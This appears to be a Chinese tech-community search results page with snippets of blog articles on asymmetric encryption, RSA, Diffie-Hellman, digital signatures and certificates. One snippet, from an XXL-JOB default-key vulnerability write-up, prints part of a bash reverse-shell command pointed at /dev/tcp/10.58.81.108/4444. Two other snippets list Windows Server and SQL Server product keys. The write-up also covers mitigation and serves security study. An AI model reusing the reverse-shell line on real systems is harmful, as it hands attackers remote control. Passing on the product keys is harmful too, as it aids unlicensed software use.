首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏数安视界

    非对称密钥沉思系列(4):密钥交换

    图片非对称密钥加解密的性能相对于对称密钥,差了很多,在这实际的业务流加解密中,无法进行业务落地。 因此在实际的工程化上,一般使用非对称密钥进行数据密钥的协商与交换,而使用数据密钥与对称加密算法进行数据流的加解密保护。 基于RSA的密钥交换简单的密钥交换过程基于RSA进行密钥交换,基于非对称密钥的两个基本特性:使用公钥加密、私钥解密,且此过程无法逆向公钥是对外公开的,私钥是私密不公开的客户端与服务端在简单的密钥交换场景中 其实结合《非对称密钥沉思系列(2):聊聊RSA与数字签名》中的内容,我们在做随机密钥的交换时,还可以结合对随机密钥的HMAC等手段,保证随机密钥的不被篡改。这里感兴趣的同学可以自己思考下。 密钥交换协议DH前面我们聊了很多RSA,但其实,RSA更侧重于非对称密钥算法,主要功能其实还是在于加密与解密。而密钥交换协议DH,是专门用于协商密钥生成的。

    8.4K11319编辑于 2023-01-04
  • 来自专栏向治洪

    DH密钥交换非对称加密

    这个密钥可以在后续的通讯中作为对称密钥来加密通讯内容。 (1)、算法描述 离散对数的概念: 原根:如果a是素数p的一个原根,那么数值: amodp,a^2 modp,…,a^(p-1) modp 是各不相同的整数,且以某种排列方式组成了从1到p- 97=75 (2)、安全性 当然,为了使这个例子变得安全,必须使用非常大的XA, XB 以及p, 否则可以实验所有的可能取值。 注意g则不需要很大, 并且在一般的实践中通常是2或者5。 在最初的描述中,迪菲-赫尔曼密钥交换本身并没有提供通讯双方的身份验证服务,因此它很容易受到中间人攻击。  有很多种安全身份验证解决方案使用到了迪菲-赫尔曼密钥交换。例如当Alice和Bob共有一个公钥基础设施时,他们可以将他们的返回密钥进行签名。

    2.4K50发布于 2018-02-01
  • 来自专栏数安视界

    非对称密钥沉思系列(2):聊聊RSA与数字签名

    但是,无论MAC在算法实现上多么的优雅,MAC始终有一个很致命的问题,就是它需要共享密钥!使用共享密钥意味着,一旦密钥泄露,数据的安全性将会极大的降低。 回顾下非对称密钥的特性在前面的文章《非对称密钥沉思系列(1):RSA专题之PKCSv1.5填充模式下的选择性密文攻击概述》中,我们探讨了非对称秘钥的一些特性,这里总结几个比较重要的性质:非对称加密总是以密钥对的形式出现 ,而在对称加密中总是共享一般密钥非对称加密的效率问题这里其实就是要强调,非对称加解密是一个很慢的过程。相比较于对称加密解密,非对称加解密的过程是一种相当低效的过程。 MAC场景下,其共享密钥,理论上只会被两方共享,持有第三方密钥的人无法替换由真实共享密钥生成的MAC值;而在RSA数字签名的场景下,用于创建数字签名的私钥是不被共享的,而公钥确实公开且可以被任何人持有的

    3.2K4520编辑于 2022-12-12
  • 来自专栏小工匠聊架构

    PKI - 02 对称与非对称密钥算法

    非对称密钥算法: 非对称密钥算法使用一对密钥,分别是公钥和私钥,用于加密和解密数据。 公钥是公开的,任何人都可以使用它来加密数据;私钥是保密的,只有拥有者才能解密数据。 非对称密钥算法还可以用于数字签名和密钥交换等安全操作。 典型的非对称密钥算法包括RSA、DSA、ECC等。 优点是密钥管理相对简单,不需要在传输过程中共享私钥,但加密和解密速度较慢。 非对称密钥算法 非对称密钥算法的主流协议为RSA,需要每一个参与者产生一对密钥。共享公钥到服务器,严格保障私钥的安全性。根据这种操作的特点,也被称作公共密钥系统。 缺点 非对称密钥算法虽然具有许多优点,但也存在一些缺点,其中包括: 加密速度较慢:相比对称密钥算法,非对称密钥算法的加密和解密速度通常较慢。 非对称密钥的的用途一: 一种简单而优雅的“混合加密”解决方案 用对称密钥算法加密大块数据(因为速度快) , 用非对称密钥算法加密密钥(因为安全)。

    55500编辑于 2024-05-25
  • 来自专栏MySQL解决方案工程师

    使用MySQL Keyring 的 SECRET类型密钥执行非对称加密

    作者:Mike Frank 译:徐轶韬 仅用于通过应用程序使用解密/加密 以下是一个示例,演示应用程序使用公钥进行非对称加密数据。 Townsend Alliance Key Manager 其他用于密钥管理的API: 使用自己的密钥– 加密密钥文件 Hashicorp Vault 更多 先决条件 MySQL企业版8.0.19或更高版本 如果密钥被盗–小偷可以读取您的敏感数据。 您可以使用带有公共或私有密钥(PEM格式)的openssl或兼容库来实现。只要确保您以二进制形式插入/更新数据即可。 如果我的数据大于非对称加密可以处理的数据怎么办? 通过keyring,非对称加密,对称加密,权限和其他访问控制,解决数据安全性的方法还有多种多样的选择。 例如,用户只能将公钥存储在主服务器上,将私钥存储在只读从服务器上。

    2.4K40发布于 2020-09-28
  • 非对称密钥沉思系列(3):公钥、签名与证书

    使用易加密工具验证证书信息 易加密工具的介绍 项目地址 安装方式:pip install easy-encryption-tool 数字签名与证书 在上一篇文章《非对称密钥沉思系列(2):聊聊RSA与数字签名 密钥长度特性 RSA的密钥长度,无论从公钥还是私钥中都可以获取到,其以比特长度来进行表达。 都与密钥长度保持一致,都是密钥长度个字节数 密钥长度的大小,与n值需要的比特数是一样的 """ pub_key, pri_key = rsa_base.generate_rsa_keypair 关于RSA加密时明文最长长度,可以参考签名的文章:《非对称密钥沉思系列(1):RSA专题之PKCSv1.5填充模式下的选择性密文攻击概述》 中的推理。 基于非对称秘钥的身份验证流程,是我们整个网络应用安全的基础。

    3K4719编辑于 2024-04-07
  • 来自专栏玉龙小栈

    对称及非对称加密工作原理,附:密钥交换的过程

    非对称加密算法: 非对称算法也叫公钥加密,使用两个密钥:一个公钥和一个私钥,这两个密钥在数学上是相关的。 对称密钥算法的优缺点: 对称密钥的主要优点在于速度快,通常比非对称密钥快100倍以上,而且可以方便地通过硬件实现。 主要问题在于密钥的管理复杂。 由于每个通信者间都需要一个不同的密钥,N个人通信需要=n(n-1)/2密钥;同时如何安全的共享加密密钥给需要解密的接受者成为最大的问题,并且由于没有签名机制因此也不能实现抗可抵赖问题,即通信双方都可以否认发送或接收过的信息 非对称密钥算法的优缺点: 非对称密钥的主要优势在于密钥能够公开,由于用作加密的密钥(也称公开密钥)不同于作解密的密钥(也称私人密钥)因而解密密钥不能根据加密密钥推算出来,所以可以公开加密密钥。 公钥加密用私钥解密叫加密 私钥加密用公钥解密叫签名 基于公钥的密钥交换步骤如下(数字信封的工作原理): 1、发件人获得收件人的公钥 2、发件人创建一个随机机密密钥(在对称密钥加密中使用的单个密钥) 3、

    6.4K10编辑于 2022-01-13
  • 来自专栏【计网】Cisco

    【网络安全】网络防护之旅 - 非对称密钥体制的解密挑战

    资源获取:关注文末公众号回复 网络安全实验 2. 非对称密钥体制的解密挑战 ️‍♂️2.1 研究目的 深度解析非对称加密机制:这次实验旨在通过深入研究RSA算法,全面理解非对称加密的核心原理。 它采用一对密钥,即公钥和私钥,分别用于加密和解密的过程。这两者密切相关,却拥有不同的功能。以下是对非对称加密体制基本原理的深入解析: 密钥对生成:用户通过数学算法生成一对非对称密钥,包括公钥和私钥。 数字签名:非对称加密可用于数字签名。发送方可使用私钥对消息进行签名,而接收方则能够使用发送方的公钥验证签名的真实性,确保消息的来源和完整性。 密钥交换:非对称加密体制能够被应用于密钥交换。 公钥和私钥: 公钥:(e, n) 私钥:(d, n) 2. 加密过程: 获取公钥(e, n): 发送方获取接收方的公钥。 将明文转换为整数m: 明文m需小于n。 : 在实验中,清晰认识到非对称密钥体制与对称密钥体制的差异,其包含公钥和私钥,分别用于加密和解密。

    67910编辑于 2024-02-20
  • 来自专栏悟空聊架构 | 公众号

    WCF安全2-非对称加密

    概述: 数字签名和加密依赖于相应的加密算法   自变量:加密前的数据、密钥   因变量:加密后的数据 加密算法分类:根据加密和解密这两种步骤采用的密钥的是否相同进行分类   相同:对称加密   不相同: 非对称加密 非对称加密的应用场景:   (1)通过对消息进行加密解决机密性问题(消息的内容仅对发送者期望的接收者可见) (2)通过数字签名实现身份认证和数据一致性 1.消息加密 非对称加密:公钥/私钥 2.数字签名 签名: (1)发送方采用某种算法对整个消息的内容实施哈希计算,得到一个哈希码 (2)发送发使用自己的私钥对该哈希码进行加密,加密后得到的密文就是数字签名 (3)将数字签名和密钥对中的公钥附加到源消息上 -sky keytype:指定密钥类型,必须是signature、exchange或一个标识提供程序类型的证书(1标识交换密钥2标识签名密钥)。 通过下面的命令会创建一个主题名称为www.artech.com的数字证书,密钥类型为交换密钥,并且包含私钥。 ?

    90360发布于 2018-05-18
  • 来自专栏小工匠技术圈

    【Java小工匠聊密码学】--非对称加密--DH密钥交换算法

    Diffie-Hellman是一种建立密钥的方法,而不是加密方法。然而,它所产生的密钥可用于加密、进一步的密钥管理或任何其它的加密方式。 2、DH密钥交换算法原理 2.1、使用颜色形象描述 设想这样一个场景,Alice(A)和Bob(B),他们想在不见面的情况下秘密约定出一种颜色,但他们互相沟通的信息都会被公开,应该怎么办呢? ? 第5步.鲍伯计算s = A b mod p 8^15 mod 23 = 2. 3、DH密钥交换算用途 可以用作对称加密算法中,双方约定的加密准则的交换(对方的公钥和自己的私钥计算的到秘密整数,可以作为双方的加密准则 (secrectKey1); String secrectKeyStr2 = encodeHex(secrectKey2); System.out.println("甲方协议密钥 :" + secrectKeyStr1); System.out.println("乙方协议密钥:" + secrectKeyStr2); System.out.println

    1.7K30发布于 2018-08-10
  • 来自专栏数安视界

    非对称密钥沉思系列 收官篇:证书格式与编码的部分总结

    ,定义私钥信息语法标准,用于描述证书密钥对的通用格式(不限RSA)PKCS#11定义了密钥 Token接口,常用于单点登录/公钥算法/磁盘加密系统. openssl工具操作RSA公私钥编码示例使用openssl生成一对RSA密钥:openssl genrsa -out private_pkcs1.pem 2048从生成的RSA密钥中提取RSA公钥:openssl //FeVQwn/6UE2Nf2qCBRygVnXKtJPpEwIDAQAB-----END RSA PUBLIC KEY-----将PEM格式的密钥转换成DER格式的密钥openssl rsa -in #8PKCS#1形式的密钥专指RSA的密钥,ECC的密钥无法用PKCS#1形式来表达。 PKCS#8形式的密钥,既可以表示RSA密钥,又可以表示ECC的密钥

    5.8K4318编辑于 2023-01-04
  • 来自专栏计算机工具

    国密算法,明文、密文、密码、密钥、对称加密、非对称加密简单理解

    密码学中应用最为广泛的的三类算法: 1、对称算法(分组密码算法)代表分组密码算法(DES和SM4); 2非对称算法(公钥密码算法)代表公钥密码算法(RSA和SM2); 3、杂凑算法(摘要算法)代表摘要算法 密钥分为对称密钥非对称密钥。 ,如果每个客户端与服务端单独维护一个密钥,那么服务端需要管理的密钥将是成千上万,这会给服务端带来噩梦 非对称密钥 非对称密钥(public-key cryptography),又称为公开密钥加密,服务端会生成一对密钥 非对称密钥在加密和解密的过程的使用的密钥是不同的密钥,加密和解密是不对称的,所以称之为非对称加密。 常见的非对称加密有RSA,非对称加解密的过程: 1.服务端生成配对的公钥和私钥 2.私钥保存在服务端,公钥发送给客户端 3.客户端使用公钥加密明文传输给服务端 4.服务端使用私钥解密密文得到明文 数字签名

    1.1K10编辑于 2024-12-16
  • 来自专栏全栈程序员必看

    windows server 2012 r2安装密钥_windows7激活密钥

    Windows Server 2012 R2 安装密钥(只适用安装,不支持激活) 标准版 = NB4WH-BBBYV-3MPPC-9RCMV-46XCB 数据中心版 = BH9T4-4N7CW- 67J3M-64J36-WW98Y M98WF-NY2PP-73243-PC8R6-V6B4Y Retail Key MR88Y-BXNRY-VH3DR-349CB-3GK8M retail Key M89WF-NY2PP

    18.5K20编辑于 2022-11-04
  • 来自专栏全栈程序员必看

    SQLServer2008R2密钥「建议收藏」

    SQLServer2008 R2 密钥: Developer: PTTFM-X467G-P7RH2-3Q6CG-4DMYB Enterprise: JD8Y6-HQG69-P9H84-XDTPG-34MBB Microsoft SQL Server 2008 R2序列号密钥 开发版32位:MC46H-JQR3C-2JRHY-XYRKY-QWPVM 开发版64位:FTMGC-B2J97-PJ4QG-V84YB-MTXX8 工组版:XQ4CB-VK9P3-4WYYH-4HQX3-K2R6Q WEB版:FP4P7-YKG22-WGRVK-MKGMX-V9MTM 数据中心版32位:PTTFM-X467G-P7RH2-3Q6CG -4DMYB 数据中心版64位:DDT3B-8W62X-P9JD6-8MX7M-HWK38 企业版32位:R88PF-GMCFT-KM2KR-4R7GB-43K4B 企业版64位:GYF3T-H2V88 -GRPPH-HWRJP-QRTYB 标准版32位:CXTFT-74V4Y-9D48T-2DMFW-TX7CY 标准版64位:B68Q6-KK2R7-89WGB-6Q9KR-QHFDW 发布者:全栈程序员栈长

    12.2K30编辑于 2022-07-22
  • 来自专栏明丰随笔

    非对称加密

    非对称加密的类型之间的关系如图所示。 ? 加密模式 加密模式只有一种实现,即RSACryptoServiceProvider,采用的是RSA算法。 不管是对称加密还是非对称加密,密钥都是关键。 在对称加密中,密钥可以是开发者自行设定的字符串。 对于非对称加密来说,根据算法的不同密钥的格式也不相同,并且会复杂很多。 因此密钥通常是算法自动生成的,而不是由开发者来创建。 在创建RSACryptoServiceProvider类型的实例时,会自动创建一个公/私密钥对。 作为开发者而言,并不需要关心这些内容,可以简单地将其视为公/私密钥对。 在首次创建了公/私密钥对以后,就可以将公钥公开,将私钥保存。 全文回顾: 非对称加密的类型之间的关系 加密模式 自动创建一个公/私密钥对 数字签名

    1.1K20发布于 2019-07-24
  • 来自专栏第三方工具

    RAS非对称加解密-RAS加解密和签名和验签,密钥生成器(java代码)

    RAS非对称加解密-RAS加解密和签名和验签,密钥生成器(java代码) RSA 算法是一种非对称加解密算法。 服务方生成一对 RSA 密钥,即公钥 + 私钥,将公钥提供给调用方,调用方使用公钥对数据进行加密后,服务方根据私钥进行解密。 1. RAS密钥生成器 2. RAS加解密和签名和验签 代码1 3. ; import java.security.PublicKey; /** * 密钥生成器 */ public class RSAKeysGenerator { /** * RsaKey String content) { // 报文体签名 String contentSign = ""; try { // 根据密钥字符创建密钥类 sign); // url解密[返回报文] src = URLDecoder.decode(src, encoding); // 根据密钥创建密钥

    65510编辑于 2024-10-09
  • 来自专栏大龄程序员的人工智能之路

    解读国密非对称加密算法SM2

    本文先介绍非对称加密算法,然后聊一聊椭圆曲线密码算法(Elliptic Curve Cryptography,ECC),最后才是本文的主题国密非对称加密算法SM2。 而非对称密钥加密算法则是加密密钥和解密密钥不同,这个有点违反普通常理,但确实存在这样的算法,其背后的理论非常复杂。我们不需要懂得多少其背后的理论,也可以采用非对称密码算法做很多安全方面的工作。 在整个密码学体系中,非对称加密算法用途更广,可以用在加密解密、密钥协商、数字签名等方面。所以本文先介绍一下非对称加密算法。 非对称加密算法 非对称加密算法也称作公开密钥算法(Public Key Cryptography),有着一对密钥:公钥(Public Key)和私钥(Private Key)。 小结 本文从非对称密码算法开始,逐步介绍到国密SM2算法。我们可以看到,SM2并不是一个全新设计的算法,而是借助现有的ECC理论,设计了一条命名曲线。

    6.1K20发布于 2020-03-25
  • 来自专栏OneMoreThink的专栏

    漏洞实战(2):XXL-JOB默认密钥漏洞

    2、危害 攻击者可以对执行器所在的服务器进行任意命令执行,从而获得执行器所在服务器的权限。 /dev/tcp/10.58.81.108/4444 0>&1", 4、防御 修改accessToken的默认值,调度中心和执行器的值需保持一致,例如将accessToken修改为cGqJjTqH2VMB2R1 : sed -i 's/default_token/cGqJjTqH2VMB2R1/g' /usr/local/xxl-job-2.4.0/xxl-job-admin/src/main/resources /application.properties sed -i 's/default_token/cGqJjTqH2VMB2R1/g' /usr/local/xxl-job-2.4.0/xxl-job-executor-samples xxl-job-executor-samples/xxl-job-executor-sample-springboot/target/xxl-job-executor-sample-springboot-2.4.0.jar 最后再次使用默认密钥进行任意代码执行

    1.8K10编辑于 2024-10-15
  • 来自专栏前端导学

    非对称加密笔记

    这篇文章是摘抄自某个地方,现在看来这些解释ztm是yts,说了半天都说不清楚,后来我看了MIT的一个老师上课的视频才发现人家几句或说清楚的道理咱们tm的比划了半天 画了这么多图 还说不清。md! 请大家移步这里看 https://my.oschina.net/lilugirl2005/blog/3029999

    85540发布于 2019-05-26
  • 来自专栏会跳舞的机器人

    RSA非对称加密

    一、对称加密与非对称加密 对称加密:加密和解密使用的是同一个密钥,加解密双方必须使用同一个密钥才能进行正常的沟通。 非对称加密:需要两个密钥来进行加密和解密,公开密钥(public key,简称公钥)和私有密钥(private key,简称私钥) ,公钥加密的信息只有私钥才能解开,私钥加密的信息只有公钥才能解开。 非对称加密:RSA、ECC(椭圆曲线加密算法)、Diffie-Hellman、El Gamal、DSA(数字签名用) Hash 算法:MD2、MD4、MD5、HAVAL、SHA-1、SHA256、SHA512 、RipeMD、WHIRLPOOL、SHA3、HMAC 二、非对称加密工作过程 甲乙双方使用非对称加密算法的方式进行数据传输 乙方生成一对密钥(公钥与私钥),并将公钥向甲方公开 甲方获取到公钥后,将需要传输的数据用公钥进行加密发送给乙方 四、RSA非对称加密代码示例 RSA 算法基于一个十分简单的数论事实:将两个大素数相乘十分容易,但是想要对其乘积进行因式分解却极其困难,因此可以将乘积公开作为加密密钥

    2K20发布于 2018-09-03
领券